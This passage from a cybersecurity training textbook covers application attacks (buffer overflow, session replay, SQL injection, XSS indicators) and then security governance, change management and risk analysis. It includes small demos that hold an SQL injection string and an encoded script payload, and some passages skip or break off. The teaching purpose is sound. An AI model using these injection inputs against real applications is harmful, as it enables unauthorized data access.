code on the system. This is referred to as arbitrary code execution. Where the
code is transmitted from one machine to another, it can be referred to as remote
code execution. The code would typically be designed to install some sort of
backdoor or to disable the system in some way.
An application or process must have privileges to read and write data and execute
functions. Depending on how the software is written, a process may run using a
system account, the account of the logged-on user, or a nominated account.
If a software exploit works, the attacker may be able to execute arbitrary code with
the same privilege level as the exploited process. There are two main types of
privilege escalation:
• Vertical privilege escalation (or elevation) is where a user or application can
access functionality or data that should not be available to them. For instance, a
process might run with local administrator privileges, but a vulnerability allows
the arbitrary code to run with higher SYSTEM privileges.
Buffer Overflow
A buffer is an area of memory that an application reserves to store some value. The
application will expect the data to conform to some expected value size or format.
To exploit a buffer overflow vulnerability, the attacker passes data that deliberately
fills the buffer to its end and then overwrites data at its start. One of the most
common vulnerabilities is a stack overflow. The stack is an area of memory used
by a program subroutine. It includes a return address, which is the location of
the program that called the subroutine. An attacker could use a buffer overflow
to change the return address, allowing the attacker to run arbitrary code on the
system.
Operating systems use mechanisms such as address space layout randomization
(ASLR) and Data Execution Prevention (DEP) to mitigate risks from buffer overflow.
Failed attempts at buffer overflow can be identified through frequent process
crashes and other anomalies.
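The mechanics can be modeled (not exploited) in a high-level language. This sketch uses adjacent regions of a bytearray to stand in for a native stack frame; the layout and addresses are illustrative only.

```python
# Sketch: simulate a stack overflow. An 8-byte buffer sits directly below the
# saved "return address" in a 16-byte region; an unchecked copy of 16 bytes
# overwrites the return address.

STACK = bytearray(16)
BUF_START, BUF_SIZE = 0, 8   # the buffer occupies bytes 0-7...
RET_ADDR_OFFSET = 8          # ...the "return address" occupies bytes 8-15

def unsafe_copy(data):
    """Copies with no bounds check, like C's strcpy or gets."""
    STACK[BUF_START : BUF_START + len(data)] = data

STACK[RET_ADDR_OFFSET:] = (0x08048000).to_bytes(8, "little")  # legitimate value
unsafe_copy(b"A" * 8 + (0x41414141).to_bytes(8, "little"))    # 16-byte input

ret = int.from_bytes(STACK[RET_ADDR_OFFSET:], "little")
print(hex(ret))  # 0x41414141 -- the attacker now controls the return address
```

Protections such as ASLR and DEP aim to make the overwritten address useless to the attacker, rather than prevent the overwrite itself.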
Replay Attacks
In the context of a web application, a replay attack most often means exploiting
cookie-based sessions. HTTP is nominally a stateless protocol, meaning that the
server preserves no information about the client. To overcome this limitation,
mechanisms such as cookies have been developed to preserve stateful data. A
cookie is created when the server sends an HTTP response header with the cookie
data. A cookie has a name and value, plus optional security and expiry attributes.
Subsequent request headers sent by the client will usually include the cookie.
Cookies are either nonpersistent cookies, in which case they are stored in memory
and deleted when the browser instance is closed, or persistent, in which case
they are stored in the browser cache until they are deleted by the user or pass
a defined expiration date.
Session management enables a web application to uniquely identify a user across
a number of different actions and requests. A session token identifies the user
and may also be used to prove that the user has been authenticated. A replay
attack works by capturing or guessing the token value, and then submitting it to
reestablish the session illegitimately.
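Token unpredictability is the key defense against guessing. The sketch below contrasts a trivially guessable counter-based scheme with a token generated from the standard library's cryptographically secure source; the token length is an illustrative choice.

```python
# Sketch: guessable versus unpredictable session tokens.
import secrets

def weak_token(counter):
    return f"session-{counter}"       # sequential: trivially enumerable

def strong_token():
    return secrets.token_urlsafe(32)  # 256 bits from a CSPRNG

print(weak_token(1042))  # an attacker can simply count through these
print(strong_token())    # infeasible to guess or enumerate
```

Even an unpredictable token must still be protected in transit (TLS) and in the browser (cookie security attributes), since capture defeats unpredictability.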
Using The Browser Exploitation Framework (BeEF) to obtain the session cookie from a browser.
Attackers can capture cookies by sniffing network traffic via an on-path attack or
when they are sent over an unsecured network, like a public Wi-Fi hotspot. Malware
infecting a host is also likely to be able to capture cookies. Session cookies can also
be compromised via cross-site scripting (XSS).
Cross-site scripting (XSS) is an attack technique that runs malicious code in a browser in
the context of a trusted site or application.
Forgery Attacks
In contrast with replay attacks, a forgery attack hijacks an authenticated session to
perform some action without the user’s consent.
Injection Attacks
Attacks such as session replay, CSRF, and most types of XSS are client-side attacks.
This means that they execute arbitrary code in the browser. A server-side attack
causes the server to do some processing or run a script or query in a way that is
not authorized by the application design. Most server-side attacks depend on some
kind of injection attack.
An injection attack exploits some unsecure way in which the application processes
requests and queries. For example, an application might allow a user to view their
profile with a database query that should return the single record for that one
user’s profile. An application vulnerable to an injection attack might allow a threat
actor to return the records for all users, or to change fields in the record when they
are only supposed to be able to read them.
The persistent XSS and abuse of SQL queries and parameters discussed earlier in
the course are both types of injection attack. There are a number of other injection
attack types that pose serious threats to web applications and infrastructure.
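The classic example is SQL injection. This sketch contrasts a query built by string concatenation with a parameterized query, using an in-memory SQLite database; the table and data are illustrative.

```python
# Sketch: SQL injection against a concatenated query vs. a parameterized query.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, ssn TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)",
               [("alice", "111-11-1111"), ("bob", "222-22-2222")])

malicious = "alice' OR '1'='1"

# Vulnerable: the injected OR clause makes the WHERE match every row.
unsafe = db.execute(
    f"SELECT * FROM users WHERE username = '{malicious}'").fetchall()
print(len(unsafe))  # 2 -- all users' records returned

# Parameterized: the input is treated as data, so no rows match.
safe = db.execute(
    "SELECT * FROM users WHERE username = ?", (malicious,)).fetchall()
print(len(safe))  # 0
```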
This defines an entity named bar that refers to a local file path. A successful attack
will return the contents of /etc/config as part of the response.
URL Analysis
Session hijacking/replay, forgery, and injection attacks are difficult to identify, but
the starting points for detection are likely to be URL analysis and the web server’s
access log.
Data can be submitted to a server either by using a POST or PUT method and the
HTTP headers and body, or by encoding the data within the URL used to access
the resource. Data submitted via a URL is delimited by the ? character, which
follows the resource path. Query parameters are usually formatted as one or more
name=value pairs, with ampersands delimiting each pair.
The server response comprises the version number and a status code and message,
plus optional headers, and message body. An HTTP response code is the header
value returned by a server when a client requests a URL, such as 200 for “OK” or 404
for “Not Found.”
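This structure can be split apart with standard tooling. A sketch using Python's urllib follows; the URL itself is a made-up example.

```python
# Sketch: separate a URL into its path and name=value query parameters.
from urllib.parse import urlsplit, parse_qs

url = "https://example.com/profile?user=alice&view=summary"
parts = urlsplit(url)
print(parts.path)             # /profile
print(parse_qs(parts.query))  # {'user': ['alice'], 'view': ['summary']}
```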
Percent Encoding
A URL can contain only unreserved and reserved characters from the standard set.
Reserved characters are used as delimiters within the URL syntax and should only
be used unencoded for those purposes. The reserved characters are the following:
: / ? # [ ] @ ! $ & ' ( ) * + , ; =
There are also unsafe characters, which cannot be used in a URL. Control
characters, such as null string termination, carriage return, line feed, end of file,
and tab, are unsafe. Percent encoding allows a user-agent to submit any safe or
unsafe character (or binary data) to the server within the URL. Its legitimate uses
are to encode reserved characters within the URL when they are not part of the
URL syntax and to submit Unicode characters. Percent encoding can be misused
to obfuscate the nature of a URL (encoding unreserved characters) and submit
malicious input.
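Decoding a suspect URL is often the first analysis step. The sketch below uses urllib to decode percent encoding and flag characters often abused in injection attempts; the suspicious-character list is an illustrative subset, not a complete detection rule.

```python
# Sketch: decode percent-encoded URLs and flag suspicious decoded characters.
from urllib.parse import unquote

SUSPICIOUS = set("<>'\";")

def decode_and_flag(url):
    decoded = unquote(url)
    return decoded, sorted(SUSPICIOUS & set(decoded))

decoded, flagged = decode_and_flag("/search?q=%3Cscript%3Ealert(1)%3C/script%3E")
print(decoded)  # /search?q=<script>alert(1)</script>
print(flagged)  # ['<', '>']
```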
Web server access log showing an ordinary client (203.0.113.66) accessing a page and its
associated image resources, and then scanning activity from the Nikto app running
on 203.0.113.66. The scanning activity generates multiple 404 errors as it tries to map
the web app’s attack surface by enumerating common directories and files.
Review Activity:
Application Attack Indicators
2. You are reviewing access logs on a web server and notice repeated
requests for URLs containing the strings %3C and %3E. Is this an event
that should be investigated further, and why?
Lesson 13
Summary
• Consider using threat data feeds to assist with identification of documented and
published indicators.
LESSON INTRODUCTION
Security governance is a critical aspect of an organization’s overall security
posture, providing a framework that guides the management of cybersecurity
risks. It involves developing, implementing, and maintaining policies, procedures,
standards, and guidelines to safeguard information assets and technical
infrastructure. Security governance encompasses the roles and responsibilities of
various stakeholders, emphasizing the need for a culture of security awareness
throughout the organization. Governance frameworks must manage and maintain
compliance with relevant laws, regulations, and contractual obligations while
supporting the organization’s strategic objectives. Effective security governance also
involves continuous monitoring and improvement to adapt to evolving threats and
changes in the business and regulatory environment.
Lesson Objectives
In this lesson, you will do the following:
• Identify the difference among policies, procedures, standards, and guidelines.
Topic 14A
Policies, Standards, and Procedures
Policies, standards, and procedures are three key components that form
the foundation of an organization’s security program. Policies are high-level,
authoritative documents defining the organization’s security commitment.
Standards are more specific than policies and specify the methods used to
implement technical and procedural requirements. Procedures are detailed,
step-by-step instructions describing how to complete specific tasks and align to
the requirements provided in standards. Procedures provide clear directions for
individuals to perform their job duties consistently, securely, and efficiently.
Policies
Organizational policies are vital in establishing effective governance and ensuring
organizational compliance. They form the framework for operations, decision-
making, and behaviors, setting the rules for a compliant and ethical corporate
culture. Governance describes the processes used to direct and control an
organization, including the processes for decision-making and risk management.
Policies are the outputs of governance. They establish the rules that frame decision-
making processes, risk mitigation, fairness, and transparency. They set expectations
for performance, align the organization around common goals, prevent misconduct,
and remove inefficiencies.
Compliance describes how well an organization adheres to regulations, policies,
standards, and laws relevant to its operation. Organizational policies are critical in
ensuring compliance by integrating legal and regulatory requirements into daily
operations. Policies define the rules and procedures for maintaining compliance
and outline the consequences of noncompliance.
For example, an organization may have a data privacy policy that explains how
it will maintain compliance with relevant laws to protect customer data. The
policy details data collection, storage, processing, and sharing practices, including
employee responsibilities, to ensure that all organization members understand and
adhere to the rules. Organizational policies help facilitate compliance assessments
through internal and external audits as policies provide a roadmap auditors follow
to determine whether an organization is operating as it claims and is successfully
satisfying its regulatory obligations.
The goal of an AUP is to ensure that users do not engage in activities that
could harm the organization or its resources. The AUP should also detail the
consequences of noncompliance, explain how compliance is monitored, and
require employees to acknowledge their comprehension of the AUP’s rules via
signature.
Guidelines
Guidelines describe recommendations that steer actions in a particular job role
or department. They are more flexible than policies and allow greater discretion
for the individuals implementing them. Guidelines provide best practices
and suggestions on achieving goals and completing tasks effectively and help
individuals understand the required steps to comply with a policy or improve
effectiveness.
An example of a guideline might address help desk practices for using email
in response to employee support requests. The guideline
may recommend specific language, tone, or response times but would allow for
flexibility depending on the request’s circumstances. While both policies and
guidelines work to steer the actions and behaviors of employees, policies are
mandatory and define strict rules, whereas guidelines provide recommendations
and allow for more individual judgment and discretion. Regular review of guidelines
is important to ensure they remain practical and relevant. Periodic assessments and
updates to guidelines allow organizations to adapt them to changing technologies,
business operations, emerging threats, and evolving industry standards.
Procedures
Policies and guidelines set a framework for behavior. Procedures define step-by-
step instructions and checklists for ensuring that a task is completed in a way that
complies with policy.
Personnel Management
Identity and access management (IAM) involves both IT/security procedures and
technologies and Human Resources (HR) policies. Personnel management policies
are applied in three phases:
• Recruitment (hiring)—locating and selecting people to work in particular
job roles. Security issues here include screening candidates and performing
background checks.
Background Checks
A background check determines that a person is who they say they are and is
not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky. Employees working in high confidentiality environments or with
access to high-value transactions will obviously need to be subjected to a greater
degree of scrutiny. For some jobs, especially federal jobs requiring a security
clearance, background checks are mandatory. Some background checks are
performed internally, whereas others are done by an external third party.
Onboarding
Onboarding at the HR level is the process of welcoming a new employee to the
organization. The same sort of principle applies to taking on new suppliers or
contractors. Some of the same checks and processes are used in creating customer
and guest accounts.
As part of onboarding, the IT and HR function will combine to create an account
for the user to access the computer system, assign the appropriate privileges, and
ensure the account credentials are known only to the valid user. These functions
must be integrated to avoid creating accidental configuration vulnerabilities, such
as IT creating an account for an employee who is never actually hired. Some of the
other tasks and processes involved in onboarding include the following:
• Secure Transmission of Credentials—creating and sending an initial password
or issuing a smart card securely. The process needs protection against rogue
administrative staff. Newly created accounts with simple or default passwords
are an easily exploitable backdoor.
IAM automation can streamline onboarding by automating the provisioning and access
management tasks associated with new employees. It enables the automated creation
and configuration of user accounts, assignment of appropriate access privileges
based on established roles and access policies, and integration with HR systems for
efficient new employee data synchronization. IAM automation reduces manual effort,
ensures consistency, and improves security by enforcing standardized access controls,
ultimately accelerating onboarding while maintaining strong security practices.
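As a simple illustration of the provisioning logic described above, the following Python sketch automates account creation from an assigned role. The role names, privilege mappings, and account fields are all hypothetical; a real deployment would pull this data from an HR system and an IAM platform’s API:

```python
import secrets
import string

# Hypothetical role-to-privilege mapping, standing in for established
# roles and access policies.
ROLE_PRIVILEGES = {
    "helpdesk": ["ticket_system", "knowledge_base"],
    "finance": ["erp", "expense_reports"],
}

def generate_initial_password(length=16):
    """Create a random, single-use initial password."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

def provision_user(username, role):
    """Sketch of automated account creation based on an assigned role."""
    return {
        "username": username,
        "privileges": ROLE_PRIVILEGES.get(role, []),
        "password": generate_initial_password(),
        "must_change_password": True,  # force a reset at first logon
    }

new_hire = provision_user("jsmith", "helpdesk")
print(new_hire["privileges"])  # ['ticket_system', 'knowledge_base']
```

Because privileges come from a single mapping rather than per-user decisions, every account created this way receives a consistent, policy-aligned set of access rights.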
Playbooks
Playbooks are essential to establishing and maintaining organizational procedures
by establishing a central repository of well-defined, standardized strategies and
tactics. They guide personnel to ensure consistency in operations and improve
quality and effectiveness.
Playbooks facilitate knowledge sharing and continuity as employees move into new
roles or leave the organization. Playbooks also mitigate risk by documenting critical
procedures and preserving institutional knowledge. Playbooks help new team
members quickly learn established processes while existing team members have a
reference point for their tasks.
Moreover, playbooks act as a tool for quality assurance and continuous
improvement. Clearly defining processes and the best practices to handle them
makes it easier to identify and improve problem areas. By using playbooks,
organizations can monitor the use and effectiveness of procedures over time and
modify them as necessary to foster an environment of continual learning and
development.
Most significantly, playbooks are essential in incident response and crisis
management because they detail emergency procedures and contingency plans
vital to steering activities during an emergency or crisis. Playbooks help incident
response teams make quick decisions and work more effectively under stress,
leading to more resilient operations and reducing the likelihood and impact of
major security incidents.
Several best practice guides and frameworks are available to assist in developing
playbooks, such as the MITRE ATT&CK framework (https://attack.mitre.org), NIST Special
Publication 800-61 (https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final), and
Open Source Security Automation (OSSA) (https://www.opensecurityandsafetyalliance.org/About-Us).
Change Management
The implementation of changes should be carefully planned, with consideration
for how the change will affect dependent components. For most significant or
major changes, organizations should attempt to trial the change first. Every change
should be accompanied by a rollback (or remediation) plan, so that the change
can be reversed if it has harmful or unforeseen consequences. Changes should
also be scheduled sensitively if they are likely to cause system downtime or other
negative impact on the workflow of the business units that depend on the IT system
being modified. Most networks have a scheduled maintenance window period for
authorized downtime. When the change has been implemented, its impact should
be assessed, and the process reviewed and documented to identify any outcomes
that could help future change management projects.
Offboarding
An exit interview (or offboarding) is the process of ensuring that an employee
leaves a company gracefully. Offboarding is also used when a project using
contractors or third parties ends. In terms of security, there are several processes
that must be completed:
• Account Management—disable the user account and privileges. Ensure that
any information assets created or managed by the employee but owned by the
company are accessible (in terms of encryption keys or password-protected
files).
• Company Assets—retrieve mobile devices, keys, smart cards, USB media, and
so on. The employee will need to confirm (and in some cases prove) that they
have not retained copies of any information assets.
Standards
Standards define the expected outcome of a task, such as a particular
configuration state for a server, or performance baseline for a service. The
selection and application of standards within an organization center on various
dynamic elements such as regulatory requirements, business-specific needs, risk
management strategies, industry practices, and stakeholder expectations.
Regulatory requirements are the primary driver for adopting standards. The unique
operational differences between organizations dictate varying legal requirements
and security, privacy, and data protection regulations. These requirements
often require implementing specific standards or using guidelines for achieving
compliance. The healthcare industry in the United States is a classic example,
where providers must comply with stringent data protection and privacy standards
established by the Health Insurance Portability and Accountability Act (HIPAA).
Depending on the nature of its operations, customer base, or technological
dependencies, each organization must adopt standards that specifically address
its needs. For example, organizations heavily utilizing credit card transactions will
adopt the PCI DSS standard to safeguard the cardholder data environment (CDE).
Similarly, cloud-reliant organizations often prefer adopting ISO/IEC 27017 and
ISO/IEC 27018 to ensure safe and secure cloud operations.
Organizations’ risk management strategies also stress the need for appropriate
standards. Standards help identify, evaluate, and manage risks and fortify the
organization’s resilience against security incidents or data breaches. ISO/IEC 27001,
for example, provides a comprehensive framework for an information security
management system (ISMS) designed to aid organizations in effectively managing
security risks. Adherence to industry best practices also influences the adoption
of standards. Conforming to widely accepted and tested standards demonstrates
an organization’s commitment to upholding high security and data protection
levels to bolster the organization’s reputation and build trust with customers
and partners. Stakeholder expectations (such as customers, partners, vendors,
Industry Standards
Common industry standards used by public and private organizations include the
following:
• ISO/IEC 27001—An international standard that provides an information security
management system (ISMS) framework to ensure adequate and proportionate
security controls are in place.
• PCI DSS (Payment Card Industry Data Security Standard)—A standard for
organizations that handle credit cards from major card providers, including
requirements for protecting cardholder data.
Internal Standards
Organizations also establish internal standards to ensure the safety and integrity of
operations and protect valuable resources such as data, intellectual property, and
hardware. Internal standards provide consistent descriptions to define and manage
important organizational practices. Standards differ from policies in a few ways.
A simplistic view of the differences between the two is that standards focus on
implementation, whereas policies focus on business practices.
Access control standards ensure that only authorized individuals can access the
systems and data they need to do their jobs to protect sensitive information and
help prevent accidental changes or damage. Internally developed access control
standards typically include the following elements:
• Access Control Models—Defines appropriate access models for different use
cases. Examples include role-based access control (RBAC), discretionary access
control (DAC), and mandatory access control (MAC), among others.
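A minimal sketch of the RBAC model named above, using hypothetical roles and permissions: users acquire permissions only through the role they hold, never directly.

```python
# Permissions attach to roles, not to individual users (the core RBAC idea).
# Role and permission names here are invented for illustration.
ROLE_PERMISSIONS = {
    "analyst": {"read_logs", "run_scans"},
    "admin": {"read_logs", "run_scans", "modify_config"},
}

USER_ROLES = {"alice": "analyst", "bob": "admin"}

def is_authorized(user, permission):
    """A user is authorized only if their role grants the permission."""
    role = USER_ROLES.get(user)
    return permission in ROLE_PERMISSIONS.get(role, set())

print(is_authorized("alice", "modify_config"))  # False
print(is_authorized("bob", "modify_config"))    # True
```

Changing what a job function can do then means editing one role definition rather than touching every user account, which is what makes RBAC attractive for internal access control standards.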
Encryption protects data from unauthorized access, and it is vital for securing
data both at rest (stored data) and in transit (data being transmitted). Encryption
standards identify the acceptable cipher suites and expected procedures needed to
provide assurance that data remains protected.
• Encryption Algorithms—Defines allowable encryption algorithms, such as
AES (Advanced Encryption Standard) for symmetric or ECC for asymmetric
encryption.
• Key Length—Defines the minimum allowable key lengths for different types of
encryption.
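Such standards lend themselves to automated checks. The following Python sketch validates a proposed cipher configuration against an internal standard; the algorithm allow list and minimum key lengths shown are hypothetical values an organization might set, not requirements from the text:

```python
# Hypothetical internal standard: allowed algorithms and minimum key
# lengths in bits. Anything not listed is treated as disallowed.
MINIMUM_KEY_LENGTHS = {"AES": 128, "RSA": 2048, "ECC": 256}

def meets_standard(algorithm, key_bits):
    """Return True only if the algorithm is allowed and the key is long enough."""
    minimum = MINIMUM_KEY_LENGTHS.get(algorithm)
    if minimum is None:
        return False  # algorithm is not on the allow list
    return key_bits >= minimum

print(meets_standard("AES", 256))   # True
print(meets_standard("RSA", 1024))  # False: below the minimum key length
print(meets_standard("DES", 56))    # False: not an allowed algorithm
```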
Legal Environment
Governance committees ensure their organizations abide by all applicable
cybersecurity laws and regulations to protect them from legal liability. The
governance committee must address these external considerations in the strategic
plan for the organization.
Governance committees must manage many legal risks, such as regulatory
compliance requirements, contractual obligations, public disclosure laws, breach
liability, privacy laws, intellectual property protection, licensing agreements, and
many others. Cybersecurity governance committees must interpret and translate
these legal requirements into operational controls to avoid legal trouble, act
ethically, and protect the organization.
The key frameworks, benchmarks, and configuration guides may be used to
demonstrate compliance with a country’s legal/regulatory requirements or with
industry-specific regulations. Due diligence is a legal term meaning that responsible
persons have not been negligent in discharging their duties. Negligence may
create criminal and civil liabilities. Many countries have enacted legislation that
criminalizes negligence in information management. In the United States, for
example, the Sarbanes-Oxley Act (SOX) mandates the implementation of risk
assessments, internal controls, and audit procedures. The Computer Security Act
(1987) requires federal agencies to develop security policies for computer systems
that process confidential information. In 2002, the Federal Information Security
Management Act (FISMA) was introduced to govern the security of data processed
by federal government agencies.
Global Law
As information systems become more interconnected globally, many countries have
enacted laws with broader, international reach. Some examples include the General
Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA),
both of which protect the privacy of their respective constituents irrespective of
geopolitical boundaries.
Varonis’s blog contains a useful overview of privacy laws in the United States
(varonis.com/blog/us-privacy-laws).
Financial Services
• Gramm-Leach-Bliley Act (GLBA) (United States)
Telecommunications
• Communications Assistance for Law Enforcement Act (CALEA) (United States)
Energy
• North American Electric Reliability Corporation (NERC) (United States and
Canada)
Government
• Federal Information Security Modernization Act (FISMA) (United States)
Governance Boards
Governance boards are crucial in ensuring an organization’s effective security
governance and oversight because they are responsible for setting strategic
objectives, policies, and guidelines for security practices and risk management.
Governance boards oversee the implementation of security controls, work
closely with risk management teams to ensure compliance with relevant laws
and regulations, and evaluate the security program’s overall effectiveness.
• Regulatory Agencies—Regulatory agencies establish and enforce security
standards, regulations, and guidelines. They oversee compliance with laws
related to specific sectors such as finance, healthcare, telecommunications,
and energy.
• Intelligence Agencies—Intelligence agencies gather and analyze information
to identify and counteract potential security threats and provide this
information to national-level government groups to steer national policy and
military strategy.
• Law Enforcement Agencies—Law enforcement agencies enforce laws and
regulations related to public safety and security. They investigate and
prosecute criminal activities, including cybercrimes and terrorist activities.
• Defense and Military Organizations—Defense and military organizations are
responsible for safeguarding national security and protecting the country
from external threats. They develop strategies, policies, and capabilities to
address physical security, border control, and defense-related cybersecurity.
• Data Protection Authorities—Data protection authorities focus on protecting
personal data and privacy rights. They enforce data protection regulations
and provide guidance on the best practices for securing personal information.
• National Cybersecurity Agencies—National cybersecurity agencies focus on
protecting critical infrastructure, government networks, and national
cybersecurity interests. They develop cybersecurity strategies, coordinate
incident response, and provide guidance on cybersecurity practices for
government entities and private organizations.
Review Activity:
Policies, Standards, and Procedures
1. This policy outlines the acceptable ways in which network and computer
systems may be used.
Topic 14B
Change Management
• System updates
• Software patching
• Network modifications
If not properly managed, these changes can introduce new vulnerabilities into the
system, disrupt services, or negatively impact the organization’s compliance status.
A robust change management program allows all changes to be tracked, assessed,
approved, and reviewed. Each change must include documentation, including
details describing what will be changed, the reasons for the change, any potential
impacts, and a rollback plan in case the change does not work as planned. Each
change must be subject to risk assessment to identify potential security impacts.
Appropriate personnel must approve changes before implementation to ensure
accountability and ensure changes align with business priorities.
After implementation, changes must be reviewed and audited to ensure they have
been completed correctly and achieved their stated outcome without compromising
security. Systematic management of changes supports an organization’s ability to
reduce unexpected downtime and system vulnerabilities. Change management
programs contribute to operational resilience by ensuring that changes support
business objectives without compromising security or compliance.
implement or approve changes. In this regard, deny lists help prevent unauthorized
or risky changes from being implemented. They can serve as a security measure to
clearly identify off-limits change types so that there is no room for negotiation or
misinterpretation.
Allow and block lists also refer to technical controls that exist in a few different
contexts, including access controls, firewall rules, and software restriction
mechanisms. Allow and block lists can impact change implementation by causing
unintended problems. For example, software allow lists can be negatively impacted
by software patching. If allow lists are based on executable file hash values, they
will fail to recognize newly patched executables after patching because their hash
values will change. This can result in fully patched systems that are unusable by
employees because none of the previously allowed software can run. Regarding
change management, it is important to incorporate the potential impacts of allow
and block lists into the testing plan.
Software Restriction Policies (block list) can be based on file hash values.
(Screenshot used with permission from Microsoft.)
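The hash-mismatch problem described above can be sketched in Python. The byte strings below are placeholders standing in for executable contents before and after patching, not real binaries:

```python
import hashlib

def file_hash(data: bytes) -> str:
    """SHA-256 digest, as a hash-based allow list might record it."""
    return hashlib.sha256(data).hexdigest()

# Placeholder contents of an executable before and after a patch.
original = b"MZ\x90\x00...original executable bytes..."
patched = b"MZ\x90\x00...patched executable bytes..."

# The allow list records the hash of the pre-patch executable.
allow_list = {file_hash(original)}

# After patching, the hash no longer matches, so the fully patched
# (and legitimate) program would be blocked from running.
print(file_hash(original) in allow_list)  # True
print(file_hash(patched) in allow_list)   # False
```

This is why hash-based allow lists must be regenerated as part of the patch rollout, and why testing plans for changes should account for allow and block list behavior.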
Restricted activities refer to actions or changes that require additional scrutiny, strict
controls, or higher levels of approval/authorization due to their potential impact on
critical systems, sensitive data, or regulatory compliance.
• Change Requests—Change requests themselves should be reviewed and updated
to reflect the details and status of the change, including any modifications
or approvals during the change management process.
• Policies and Procedures—Changes may impact existing policies and procedures.
As a result, these documents need to be reviewed and updated to ensure they
align with the new processes, guidelines, or controls introduced through the
change.
• System or Process Documentation—Documentation should reflect any changes to
systems, applications, or processes. It may involve updating system
architecture, diagrams, process flows, standard operating procedures (SOPs),
or user manuals to represent the current state and functionality of the
changed system.
• Configuration Management Documentation—Changes to configuration items, such
as servers, networks, or databases, should be tracked and documented within
the configuration management system to maintain an accurate record of their
configuration.
• Training Materials—Changes often impact employees, and they may require more
training. Existing training materials, such as presentations, manuals, or
computer-based learning modules, must be reviewed and updated as warranted.
• Incident Response and Recovery Plans—Changes made to systems or applications
may necessitate updates to incident response and recovery plans to ensure
they account for the revised configurations, new dependencies, or recovery
procedures resulting from the change.
Policies and procedures must change as often as technology does, which is often!
Review Activity:
Change Management
Topic 14C
Automation and Orchestration
Automation and orchestration are powerful tools for managing security operations.
Automation uses software to perform repetitive, rule-based tasks, such as
monitoring for threats, applying patches, maintaining baselines, or responding
to incidents, to improve efficiency and reduce the likelihood of human error.
Orchestration enhances automation by coordinating and streamlining the
interactions between automated processes and systems. Orchestration supports
seamless and integrated workflows, especially in large, complex environments
with many different security tools and systems. Automation and orchestration
also provide clear audit trails supporting regulatory compliance and incident
investigation. While their implementation comes with challenges such as
complexity, cost, and the potential for a single point of failure, careful management
of these tools can greatly improve an organization’s security posture.
• Provisioning—User and resource provisioning are fundamental IT tasks that
greatly benefit from automation and scripting. User provisioning describes
creating, modifying, or deleting user accounts and access rights across IT
systems. Resource provisioning describes allocating IT resources such as
servers, storage, and networks to applications and users. Automation can
improve these tasks, reduce manual effort, minimize errors, and improve
turnaround time. Scripting these tasks helps organizations provide consistent
implementation and improve compliance.
• Guardrails and Security Groups—Guardrails and security groups provide
frameworks for managing security within an organization. Automated guardrails
can monitor and enforce compliance with security policies, ensuring that
risky activities and behavior are prevented or flagged for review. Security
groups define which resources a user or system can access. Security groups
can also be managed more efficiently through automation, reducing the
possibility of unauthorized access or excessive permissions.
• Ticketing—Automation can significantly improve the efficiency of ticketing
platforms. Incidents detected by monitoring systems can automatically
generate support tickets, and automation can also route tickets based on
predefined criteria, ensuring they reach the right team or individual for
resolution. Automated escalation procedures can also ensure that critical
issues receive immediate attention. Examples include high-impact incidents,
incidents requiring specialized teams, incidents involving executives and
important customers, or any issue that risks violating an established SLA.
• Service Management—Automation and scripting are also essential tools for
managing services and access within an IT environment. Security analysts can
automate routine tasks such as enabling or disabling services, modifying
access rights, and maintaining the lifecycle of IT resources, freeing up time
to focus on more strategic or complicated analytical tasks.
• Continuous Integration and Testing—The principles of continuous integration
and testing hinge heavily on automation. In this approach, developers
regularly merge their changes back to the main code branch, and each merge is
tested automatically to help detect and even fix integration problems. This
capability improves code quality, accelerates development cycles, and reduces
the risk of integration issues.
• Application Programming Interfaces (APIs)—APIs enable different software
systems to communicate and interact, and automation can orchestrate these
interactions, creating seamless workflows and facilitating the development of
more complex systems, such as security orchestration, automation, and
response (SOAR) platforms.
Automation can support staff retention initiatives by reducing fatigue from repetitive
tasks. Automation practices can free staff to perform more rewarding work and increase
job satisfaction.
Important Considerations
While automation and orchestration provide numerous benefits, they also present
some significant challenges, some of which are listed below:
• Complexity—Implementing automation and orchestration requires a deep
understanding of an organization’s systems, processes, and interdependencies.
A poorly planned or executed automation strategy can add complexity, making
systems more difficult to manage and maintain.
Maintaining system security when new hardware or infrastructure items are added
to the network can be achieved by enforcing standard configurations across the
company. With automated configurations, these newly added items can be kept up to
date and secure.
Review Activity:
Automation and Orchestration
Lesson 14
Summary
You should be able to identify the importance of governance and its role in shaping
the capabilities of a security program.
LESSON INTRODUCTION
Effective risk management practices involve systematically identifying, assessing,
mitigating, and monitoring organizational risks. Audits provide an independent
and objective evaluation of processes, controls, and compliance, ensuring
adherence to standards and identifying gaps that pose risks. On the other hand,
assessments help evaluate the effectiveness of risk management strategies, identify
potential vulnerabilities, and prioritize mitigation efforts. By combining audits and
assessments, organizations can comprehensively understand risks, implement
appropriate controls, and continuously monitor and adapt their risk management
strategies to protect against potential threats. These practices are essential for
maintaining proactive and resilient security operations while ensuring compliance
with legal mandates.
Lesson Objectives
In this lesson, you will do the following:
• Explain risk management processes and concepts.
Topic 15A
Risk Management Processes and
Concepts
Risk Assessment
Risk assessment is a core component of a cybersecurity program that evaluates
previously identified risks to determine their potential impact on the organization.
Risk assessment methodologies include ad hoc, recurring, one-time, or continuous.
Ad hoc risk assessments are conducted as needed, often in response to specific
incidents, such as news of a new, actively exploited zero-day vulnerability or
environmental changes such as system upgrades. One-time assessments are
comprehensive evaluations carried out at a particular point in time, often during
the implementation of a new system (or process) or to obtain an independent
assessment of an organization's operational maturity. Recurring risk assessments
are scheduled at regular intervals, such as annually, quarterly, or monthly, and
can include audits, compliance checks, vulnerability scans, and other types of
assessment. Continuous risk assessments constantly evaluate risks and are
supported by specialized tools that produce real-time data, such as agent-based
vulnerability scanning platforms and intrusion detection systems. Different risk
assessment methods are commonly combined to ensure effective identification
and management of risk.
Quantitative risk assessment aims to assign concrete values to each risk factor.
(Image © 123RF.com.)
Quantitative Analysis
Quantitative risk analysis aims to assign concrete values to each risk factor.
• Single Loss Expectancy (SLE)—The amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an exposure factor (EF). EF is the percentage of the asset value that
would be lost. For example, it may be determined that a tornado weather event
will damage 40% of a building. The exposure factor in this case is 40% because
only part of the asset is lost. If the building is worth $200,000, the SLE for this event is $200,000 × 0.4, or $80,000.
